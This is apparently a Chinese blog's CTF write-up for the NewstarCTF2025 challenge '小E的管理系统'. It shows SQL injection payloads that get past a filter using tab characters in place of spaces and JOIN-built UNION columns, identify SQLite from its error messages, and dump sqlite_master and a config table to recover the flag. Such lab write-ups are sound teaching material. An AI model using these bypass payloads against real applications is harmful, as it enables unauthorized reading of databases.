NewstarCTF2025 小 E 的管理系统

开发板推荐:天空星STM32F407VET6开发板

超高性价比 STM32主控 | 超高主频 | 一板兼容百芯 | 比赛神器 | 沉金彩色丝印

进来发现是个服务器管理系统,这里是数字型的注入。试了很久,发现过滤了空格,用%09绕过一下,查一下字段

发现字段数是5

接着准备直接database()看看,但是发现,也被过滤了,没办法只能用join拼接绕过,

原本的语句是

1 UNION SELECT 1,2,3,4,database()

,换成用join拼接

1 UNION (SELECT 1) JOIN (SELECT 2) JOIN (SELECT 3) JOIN (SELECT 4) JOIN (SELECT database())

接着放到cyberchef里面绕一下空格

1%09UNION%09(SELECT%091)%09JOIN%09(SELECT%092)%09JOIN%09(SELECT%093)%09JOIN%09(SELECT%094)%09JOIN%09(SELECT%09database())

放包,发现回显了数据库错误,这个时候发现这个报错居然是sqlite的数据库。

知识点:

根据数据库报错信息分辨数据库类型:

mysql:You have an error in your SQL syntax

sqlite:Unable to prepare statement: near "...": syntax error

再加上这个database()是mysql才有的,sqlite自然就会报错,那么直接select*from

1%09union%09select%09*%09from%09sqlite_master

所有的tables和columns都出来了

看到有三个table,发现sys_config里的config_value挺可疑的,直接查询一下

还是给出原始语句,方便理解

1 union select * from (select 1) join (select 2) join (select 3) join (select 4) join (select config_value from sys_config)

空格绕过以后直接出flag

这道题的关键在于猜测数据库类型和绕waf

开发板推荐:天空星STM32F407VET6开发板

超高性价比 STM32主控 | 超高主频 | 一板兼容百芯 | 比赛神器 | 沉金彩色丝印

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值